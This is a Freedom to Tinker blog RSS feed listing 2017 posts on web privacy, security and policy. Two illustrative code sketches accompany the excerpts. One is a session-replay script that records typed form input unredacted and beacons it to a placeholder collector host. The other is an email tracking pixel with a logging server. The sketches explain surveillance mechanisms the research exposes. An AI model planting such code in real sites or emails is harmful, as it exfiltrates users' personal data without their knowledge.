Subscribe: Freedom to Tinker
http://www.freedom-to-tinker.com/?feed=rss2

Freedom to Tinker



Research and expert commentary on digital technologies in public life



Last Build Date: Mon, 20 Nov 2017 17:24:43 +0000

 



No boundaries: Exfiltration of personal data by session-replay scripts

Wed, 15 Nov 2017 14:21:51 +0000

By Steven Englehardt, Gunes Acar, and Arvind Narayanan. This is the first post in our “No Boundaries” series, in which we reveal how third-party scripts on websites have been extracting personal information in increasingly intrusive ways. Update: we’ve released our data: the list of sites with session-replay scripts, and the sites where we’ve […]


Media Files:
https://freedom-to-tinker.com/wp-content/uploads/2017/11/user_replay_fullstory_demo.mp4
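The excerpt above is truncated, so as a rough illustration of the mechanism the series investigates: a session-replay script bundled into a page records user interactions and sends them to a third-party collector. The sketch below is hypothetical (the collector URL, payload shape, and flush interval are invented, not taken from any vendor named in the post); it only shows why text typed into a page, including form fields, can end up on a server the site owner does not control.

// Minimal sketch of a session-replay recorder (hypothetical endpoint and payload).
// Real products are far more elaborate; this only illustrates the data flow.

type ReplayEvent =
  | { kind: "input"; selector: string; value: string; t: number }
  | { kind: "click"; selector: string; t: number };

const buffer: ReplayEvent[] = [];

function cssPath(el: Element): string {
  // Crude selector: tag name plus id if present (enough for a sketch).
  return el.id ? `${el.tagName.toLowerCase()}#${el.id}` : el.tagName.toLowerCase();
}

document.addEventListener("input", (e) => {
  const target = e.target as HTMLInputElement;
  // Note: no redaction here -- whatever is typed into the field is captured verbatim.
  buffer.push({ kind: "input", selector: cssPath(target), value: target.value, t: Date.now() });
});

document.addEventListener("click", (e) => {
  buffer.push({ kind: "click", selector: cssPath(e.target as Element), t: Date.now() });
});

// Periodically flush the recorded events to a third-party collector.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon("https://collector.example.com/replay", JSON.stringify(buffer.splice(0)));
}, 5000);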




HOWTO: Protect your small organization against electronic adversaries

Wed, 25 Oct 2017 12:24:28 +0000

October is “cyber security awareness month”. Among other notable announcements, Google just rolled out “advanced protection” — free for any Google account. So, in the spirit of offering pragmatic advice to real users, I wrote a short document that’s meant not for the usual Tinker audience but rather for the sort of person running a […]



The Second Workshop on Technology and Consumer Protection

Fri, 20 Oct 2017 16:26:24 +0000

Arvind Narayanan and I are excited to announce that the Workshop on Technology and Consumer Protection (ConPro ’18) will return in May 2018, once again co-located with the IEEE Symposium on Security and Privacy. The first ConPro brought together researchers from a wide range of disciplines, united by a shared goal of promoting consumer welfare […]



AI Mental Health Care Risks, Benefits, and Oversight: Adam Miner at Princeton

Wed, 18 Oct 2017 20:07:20 +0000

How does AI apply to mental health, and why should we care? Today the Princeton Center for IT Policy hosted a talk by Adam Miner, an AI psychologist, whose research addresses policy issues in the use, design, and regulation of conversational AI in health. Dr. Miner is an instructor in Stanford’s Department of Psychiatry and […]



Avoid an Equifax-like breach? Help us understand how system administrators patch machines

Wed, 04 Oct 2017 22:59:11 +0000

The recent Equifax breach, which leaked around 140 million Americans’ personal information, came down to a system patch that was never applied, even after the company was alerted to the vulnerability in March 2017. Our work studying how users manage software updates on desktops and mobile devices suggests that keeping machines patched is […]



I never signed up for this! Privacy implications of email tracking

Thu, 28 Sep 2017 18:52:50 +0000

In this post I discuss a new paper that will appear at PETS 2018, authored by myself, Jeffrey Han, and Arvind Narayanan. What happens when you open an email and allow it to display embedded images and pixels? You may expect the sender to learn that you’ve read the email, and which device you used […]
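As a rough illustration of the mechanism the paper measures (the tracking domain, path, and parameter names below are invented, not taken from the paper): an HTML email embeds a tiny remote image whose URL identifies the recipient, and whoever serves that image learns when the message was opened, from which IP address, and with which mail client.

// Hypothetical sketch of an email tracking pixel, for illustration only.

// Sender side: embed a 1x1 image whose URL identifies the recipient and message.
function emailBody(recipientId: string, messageId: string): string {
  const pixelUrl =
    `https://tracker.example.com/open.gif?r=${encodeURIComponent(recipientId)}` +
    `&m=${encodeURIComponent(messageId)}`;
  return `<p>Hello!</p><img src="${pixelUrl}" width="1" height="1" alt="">`;
}

// Tracker side (Node.js): every fetch of the pixel reveals when the mail was opened,
// from which IP address, and with which client (User-Agent).
import * as http from "http";

http.createServer((req, res) => {
  console.log(new Date().toISOString(), req.url, req.socket.remoteAddress,
              req.headers["user-agent"]);
  res.writeHead(200, { "Content-Type": "image/gif" });
  res.end(); // a real tracker would return a 1x1 transparent GIF here
}).listen(8080);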



What our students found when they tried to break their bubbles

Tue, 19 Sep 2017 18:59:34 +0000

This is the second part of a two-part series about a class project on online filter bubbles. In this post, we focus on the results. You can read more about our pedagogical approach and how we carried out the project here. By Janet Xu and Matthew J. Salganik This past spring, we taught an […]



Breaking your bubble

Tue, 19 Sep 2017 18:59:14 +0000

This is the first part of a two-part series about a class project on online filter bubbles. In this post, we talk about our pedagogical approach and how we carried out the project. To read more about the results of the project, go to Part Two. By Janet Xu and Matthew J. Salganik The 2016 […]



SESTA May Encourage the Adoption of Broken Automated Filtering Technologies

Mon, 18 Sep 2017 13:33:21 +0000

The Senate is currently considering the Stop Enabling Sex Traffickers Act (SESTA, S. 1693), with a scheduled hearing tomorrow. In brief, the proposed legislation threatens to roll back aspects of Section 230 of the Communications Decency Act (CDA), which relieve content providers, or so-called “intermediaries” (e.g., Google, Facebook, Twitter) of liability for the content that is hosted on their […]



Getting serious about research ethics: AI and machine learning

Mon, 18 Sep 2017 13:28:11 +0000

[This blog post is a continuation of our series about research ethics in computer science.] The widespread deployment of artificial intelligence, and specifically of machine learning algorithms, raises concerns about fundamental values in society, such as employment, privacy, and discrimination. While these algorithms promise to optimize social and economic processes, research in this area has […]